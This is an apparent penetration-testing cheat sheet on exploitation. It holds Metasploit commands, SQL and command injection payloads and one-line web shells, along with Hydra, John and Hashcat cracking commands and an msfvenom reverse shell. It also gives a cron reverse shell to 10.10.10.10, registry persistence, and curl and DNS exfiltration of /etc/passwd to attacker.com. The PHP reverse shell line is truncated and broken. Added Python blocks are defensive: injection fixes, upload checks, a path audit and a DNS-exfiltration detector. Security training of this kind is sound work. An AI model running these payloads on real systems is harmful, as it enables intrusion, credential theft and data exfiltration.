Exploitation Techniques

Systematic approaches to leveraging vulnerabilities for system compromise

Metasploit Framework

Basic Metasploit Usage

# Start Metasploit
msfconsole

# Update Metasploit
msfupdate

# Search for exploits
msf > search smb
msf > search type:exploit platform:windows

# Use an exploit
msf > use exploit/windows/smb/ms17_010_eternalblue

# Show exploit options
msf exploit(ms17_010_eternalblue) > show options

# Set target and payload
msf exploit(ms17_010_eternalblue) > set RHOSTS 192.168.1.100
msf exploit(ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf exploit(ms17_010_eternalblue) > set LHOST 192.168.1.50
msf exploit(ms17_010_eternalblue) > set LPORT 4444

# Execute exploit
msf exploit(ms17_010_eternalblue) > exploit

Common Metasploit Exploits

SMB Exploits

# EternalBlue (MS17-010)
use exploit/windows/smb/ms17_010_eternalblue

# MS08-067 (Conficker)
use exploit/windows/smb/ms08_067_netapi

# SMB relay attack
use exploit/windows/smb/smb_relay

Web Application Exploits

# Apache Struts
use exploit/multi/http/struts2_content_type_ognl

# Tomcat manager
use exploit/multi/http/tomcat_mgr_upload

# PHP CGI
use exploit/multi/http/php_cgi_arg_injection

Database Exploits

# MySQL MOF (Windows)
use exploit/windows/mysql/mysql_mof

# MSSQL xp_cmdshell
use exploit/windows/mssql/mssql_payload

Manual Exploitation Techniques

SQL Injection

Union-based SQLi

' UNION SELECT 1,2,3,4,database(),user(),version()--

Boolean-based Blind SQLi

' AND 1=1-- # True condition
' AND 1=2-- # False condition

Time-based Blind SQLi

' AND SLEEP(5)--
' AND (SELECT COUNT(*) FROM INFORMATION_SCHEMA.TABLES) AND SLEEP(5)--

Error-based SQLi

' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT database()), 0x7e))--

MSSQL Specific

'; EXEC xp_cmdshell('whoami');--
'; EXEC sp_configure 'show advanced options', 1; RECONFIGURE;--
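Added example (not from the original page): the boolean-blind probe from this section run against a string-concatenated query and against a parameterized one, using an in-memory SQLite table as a stand-in for a real backend. The users table and the lookup functions are constructed for illustration.

```python
# Added example (not from the original page): boolean-blind SQLi probe against
# a concatenated query versus a parameterized one. The users table is a
# constructed stand-in for a real backend.
import sqlite3

# Constructed sample data.
_conn = sqlite3.connect(":memory:")
_conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
_conn.executemany("INSERT INTO users (name) VALUES (?)", [("alice",), ("bob",)])
_conn.commit()


def lookup_vulnerable(name):
    """User input is pasted into the SQL text, so a quote ends the literal
    and whatever follows is evaluated as SQL."""
    sql = "SELECT id, name FROM users WHERE name = '%s'" % name
    return _conn.execute(sql).fetchall()


def lookup_safe(name):
    """Same query, but the value travels as a bound parameter, never as SQL."""
    sql = "SELECT id, name FROM users WHERE name = ?"
    return _conn.execute(sql, (name,)).fetchall()


def blind_probe_differs(lookup):
    """Boolean-blind check: do the true and false conditions from this section
    change the result? A difference means the input is evaluated as SQL."""
    true_case = lookup("alice' AND 1=1--")
    false_case = lookup("alice' AND 1=2--")
    return true_case != false_case


if __name__ == "__main__":
    print("concatenated query injectable:", blind_probe_differs(lookup_vulnerable))
    print("parameterized query injectable:", blind_probe_differs(lookup_safe))
```

Against the parameterized version both probes return nothing, because the whole string is compared as a name rather than parsed.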

Command Injection

Basic Command Injection

; ls -la
| whoami
& net user
&& dir

Bypassing Filters

;w'h'o'a'm'i
;who$()ami
;/b??/l?
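Added example (not from the original page): the shell=True pattern that the separators and quoting tricks above abuse, beside the validated argv form that leaves no shell to interpret them. The hostname-lookup feature and its function names are hypothetical.

```python
# Added example (not from the original page): command injection arises when
# input is handed to a shell as text; an allow-list plus an argv list removes
# the shell from the path. The lookup feature here is hypothetical.
import re
import subprocess
import sys

# Hostname allow-list: labels of letters, digits and inner hyphens, joined by dots.
_HOSTNAME_RE = re.compile(
    r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*\Z"
)


def is_valid_hostname(host):
    return bool(_HOSTNAME_RE.match(host)) and len(host) <= 253


def build_lookup_command_vulnerable(host):
    """Command string for shell=True: ';', '|', '&', '$()' and quotes are all
    parsed by the shell, so the payloads above run as extra commands."""
    return "ping -c 1 %s" % host


def build_lookup_command(host):
    """Validate, then return an argv list so no shell ever parses the input."""
    if not is_valid_hostname(host):
        raise ValueError("invalid hostname: %r" % host)
    return ["ping", "-c", "1", host]


def echo_literal(arg):
    """Show that an argv element reaches the child process verbatim,
    metacharacters included; a Python child stands in for any program."""
    out = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1])", arg],
        capture_output=True, text=True, check=True,
    )
    return out.stdout.rstrip("\n")


if __name__ == "__main__":
    for payload in ["example.com", "example.com; ls -la", "example.com;w'h'o'a'm'i"]:
        print(repr(payload), "valid:", is_valid_hostname(payload))
    print(echo_literal("; ls -la"))  # prints the text; nothing else runs
```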

File Upload Vulnerabilities

PHP Web Shell

PHP Reverse Shell

&3 2>&3"); ?>

ASP Web Shell

<%eval request("cmd")%>

JSP Web Shell

<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>
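Added example (not from the original page): server-side upload checks that keep the PHP, ASP and JSP one-liners above from being stored as an image. validate_upload(), its allow-list and the sample inputs are assumptions for illustration.

```python
# Added example (not from the original page): upload validation that rejects
# script files disguised as images. The allow-list and thresholds are assumed.
import os
import re

# Allowed extensions and the magic bytes each one must start with.
_ALLOWED = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
# Server-side script openers from this section; none belong in an image.
_SCRIPT_MARKERS = (b"<?php", b"<?=", b"<%", b"<script")
_SAFE_STEM = re.compile(r"^[A-Za-z0-9_-]{1,64}\Z")


def validate_upload(filename, data):
    """Return (ok, reason). Rejects disallowed or double extensions, unsafe
    names, content whose magic bytes do not match the extension, and embedded
    script markers. Store accepted files outside the web root regardless."""
    base = os.path.basename(filename.replace("\\", "/"))
    stem, ext = os.path.splitext(base)
    ext = ext.lower()
    if ext not in _ALLOWED:
        return False, "extension not allowed: %r" % ext
    if not _SAFE_STEM.match(stem):
        return False, "unsafe file name (double extension or bad characters)"
    if not data.startswith(_ALLOWED[ext]):
        return False, "content does not match %s magic bytes" % ext
    if any(marker in data.lower() for marker in _SCRIPT_MARKERS):
        return False, "embedded script marker found"
    return True, "ok"


if __name__ == "__main__":
    # Constructed inputs: a minimal PNG header and the ASP one-liner above.
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
    print(validate_upload("avatar.png", png))
    print(validate_upload("shell.php.jpg", b"\xff\xd8\xff"))
    print(validate_upload("pic.gif", b"GIF89a" + b'<%eval request("cmd")%>'))
```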

Password Attacks

Hydra Brute Force

# SSH brute force
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://target.com

# HTTP Basic Auth
hydra -l admin -P /usr/share/wordlists/rockyou.txt http-get://target.com

# HTTP POST form
hydra -l admin -P /usr/share/wordlists/rockyou.txt target.com http-post-form "/login.php:username=^USER^&password=^PASS^:Invalid"

# Other protocols
hydra -l ftp -P /usr/share/wordlists/rockyou.txt ftp://target.com
hydra -l administrator -P /usr/share/wordlists/rockyou.txt smb://target.com
hydra -l administrator -P /usr/share/wordlists/rockyou.txt rdp://target.com

Medusa Brute Force

# SSH brute force
medusa -h target.com -u root -P /usr/share/wordlists/rockyou.txt -M ssh

# HTTP brute force
medusa -h target.com -u admin -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/admin

# MySQL brute force
medusa -h target.com -u root -P /usr/share/wordlists/rockyou.txt -M mysql

John the Ripper

# Crack password hashes
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

# Crack with rules
john --rules --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

# Show cracked passwords
john --show hashes.txt

# Crack ZIP files
zip2john file.zip > zip.hash
john zip.hash

# Crack SSH private keys
ssh2john id_rsa > ssh.hash
john ssh.hash

Hashcat

# MD5 hashes
hashcat -m 0 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt

# NTLM hashes
hashcat -m 1000 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt

# WPA/WPA2
hashcat -m 2500 capture.hccapx /usr/share/wordlists/rockyou.txt

# Brute force attack
hashcat -m 0 -a 3 hash.txt ?a?a?a?a?a?a

Buffer Overflow Exploitation

Stack Buffer Overflow

Buffer Overflow Process:
  1. Identify vulnerable application
  2. Crash the application with large input
  3. Control the EIP register
  4. Find bad characters
  5. Find JMP ESP address
  6. Generate shellcode
  7. Exploit the vulnerability

Finding Buffer Overflow

# Generate cyclic pattern
msf-pattern_create -l 1000

# Find offset
msf-pattern_offset -q 0x41414141 -l 1000

# Bad character detection
python -c "print('A' * 146 + 'B' * 4 + ''.join(['\\x%02x' % x for x in range(1, 256)]))"

Shellcode Generation

# Generate shellcode with msfvenom
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"

Network Service Exploitation

SMB Exploitation

# EternalBlue exploitation
python eternal_blue_exploit.py 192.168.1.100

# SMB relay attack
python smbrelayx.py -tf targets.txt

FTP Exploitation

# FTP bounce attack
nmap -b ftp-user:password@ftp-server target.com -p 1-1000

# vsftpd backdoor (if vulnerable version)
python vsftpd_exploit.py target.com

SSH Exploitation

# SSH user enumeration exploit
python ssh_user_enum.py target.com userlist.txt

# SSH key authentication bypass
python ssh_auth_bypass.py target.com

Database Exploitation

MySQL Exploitation

# UDF privilege escalation
SELECT sys_exec('whoami');

# Load file function
SELECT LOAD_FILE('/etc/passwd');

# Write file function
SELECT 'shell content' INTO OUTFILE '/var/www/shell.php';

MSSQL Exploitation

# Enable xp_cmdshell
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

# Execute commands
EXEC xp_cmdshell 'whoami';

PostgreSQL Exploitation

# Copy command execution
COPY (SELECT '') TO PROGRAM 'id';

# Large object functions
SELECT lo_import('/etc/passwd', 1234);
SELECT lo_export(1234, '/tmp/passwd');

Privilege Escalation Techniques

Linux Privilege Escalation

# SUID binary exploitation
find / -perm -4000 -type f 2>/dev/null

# Kernel exploits
uname -a
searchsploit linux kernel 4.4.0

# Cron job exploitation
cat /etc/crontab
ls -la /etc/cron*

Windows Privilege Escalation

# Unquoted service paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v "\""

# AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# Token impersonation
whoami /priv
# If SeImpersonatePrivilege is enabled, use JuicyPotato
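Added example (not from the original page): the audit logic behind the unquoted-service-path wmic filter above, as a function that flags a service image path and lists the directories whose write permissions must be reviewed. The function name and the sample paths are constructed for illustration.

```python
# Added example (not from the original page): unquoted service path audit.
# Mirrors the wmic filters above: quoted paths and paths under C:\Windows are
# skipped; for the rest, every space in the image path yields a prefix that
# Windows will try as a program name before the real one.
import ntpath
import re


def unquoted_path_risk(pathname, skip_windows_dir=True):
    """Return the directories to ACL-check if pathname is an unquoted image
    path containing spaces, otherwise an empty list."""
    pathname = pathname.strip()
    if pathname.startswith('"'):
        return []  # quoted: the service manager sees one unambiguous path
    # The image path ends at the first ".exe"; anything after it is arguments.
    m = re.search(r"\.exe", pathname, re.IGNORECASE)
    image = pathname[: m.end()] if m else pathname.split(" ")[0]
    if " " not in image:
        return []
    if skip_windows_dir and image.lower().startswith("c:\\windows"):
        return []
    # Each space-truncated prefix (C:\Program, C:\Program Files\My, ...) is a
    # candidate program name, so the directory holding it must not be writable
    # by unprivileged users.
    dirs = []
    for i, ch in enumerate(image):
        if ch == " ":
            d = ntpath.dirname(image[:i])
            if d not in dirs:
                dirs.append(d)
    return dirs


if __name__ == "__main__":
    # Constructed sample PathName values as wmic would print them.
    for p in [r"C:\Program Files\My App\service.exe",
              r'"C:\Program Files\My App\service.exe"',
              r"C:\Windows\system32\svchost.exe -k netsvcs"]:
        print(p, "->", unquoted_path_risk(p))
```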

Post-Exploitation Techniques

Maintaining Persistence

# Linux persistence
echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1'" | crontab -

# Windows persistence
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Backdoor" /t REG_SZ /d "C:\temp\payload.exe"

Data Exfiltration

# Simple HTTP exfiltration
curl -X POST -d @/etc/passwd http://attacker.com/collect

# DNS exfiltration
for line in $(cat /etc/passwd | base64 -w 0); do dig $line.attacker.com; done

# ICMP exfiltration
python icmp_exfil.py target_file attacker_ip
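Added example (not from the original page): a detector for the DNS exfiltration pattern above (encoded chunks sent as subdomains of one parent domain), run over constructed resolver log lines. The log format, thresholds and function names are assumptions for illustration.

```python
# Added example (not from the original page): flag DNS queries whose leftmost
# label is long and high-entropy, then group them by parent domain. Log
# lines, thresholds and the base64-style labels are constructed.
import math
import re
from collections import defaultdict

_LOG_RE = re.compile(r"query: (?P<qname>\S+?)\.? IN")

# Constructed sample resolver log (BIND-style query lines).
SAMPLE_LOG = """\
client 10.0.0.5 query: www.example.com IN A
client 10.0.0.5 query: cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaAo.attacker.com IN A
client 10.0.0.5 query: ZGFlbW9uOng6MToxOmRhZW1vbjovdXNyL3NiaW46L3Vzci9z.attacker.com IN A
client 10.0.0.5 query: mail.example.com IN MX
"""


def entropy(s):
    """Shannon entropy of a string in bits per character."""
    counts = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())


def score_qname(qname, min_label=24, min_entropy=3.5):
    """True if the leftmost label looks like an encoded data chunk rather than
    a human-chosen hostname."""
    label = qname.split(".")[0]
    return len(label) >= min_label and entropy(label) >= min_entropy


def find_exfil_domains(log_text, min_hits=2):
    """Map each parent domain to its count of suspicious queries, keeping only
    domains at or above min_hits (one odd name is noise; a stream is not)."""
    hits = defaultdict(int)
    for m in _LOG_RE.finditer(log_text):
        qname = m.group("qname")
        if score_qname(qname):
            hits[".".join(qname.split(".")[1:])] += 1
    return {d: n for d, n in hits.items() if n >= min_hits}


if __name__ == "__main__":
    print(find_exfil_domains(SAMPLE_LOG))
```

Long high-entropy labels also appear in legitimate traffic (CDN tokens, anti-spam lookups), so the per-domain count and an allow-list of known services keep the false-positive rate manageable.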

Exploitation Best Practices

Testing Methodology

Systematic Approach:
  1. Verify vulnerability exists
  2. Understand the attack vector
  3. Develop proof-of-concept
  4. Test in isolated environment
  5. Execute controlled exploitation
  6. Document impact and evidence

Risk Mitigation

Minimize System Impact:
  • Test exploits in lab environment first
  • Use least invasive exploitation methods
  • Avoid causing system crashes or data loss
  • Monitor system resources during exploitation
  • Have rollback procedures ready
  • Coordinate with system administrators

Legal and Ethical Considerations

Important Reminders:
  • Ensure proper authorization before exploitation
  • Stay within defined scope and rules of engagement
  • Document all exploitation activities
  • Report critical findings immediately
  • Protect sensitive data discovered
  • Remove any backdoors or persistence mechanisms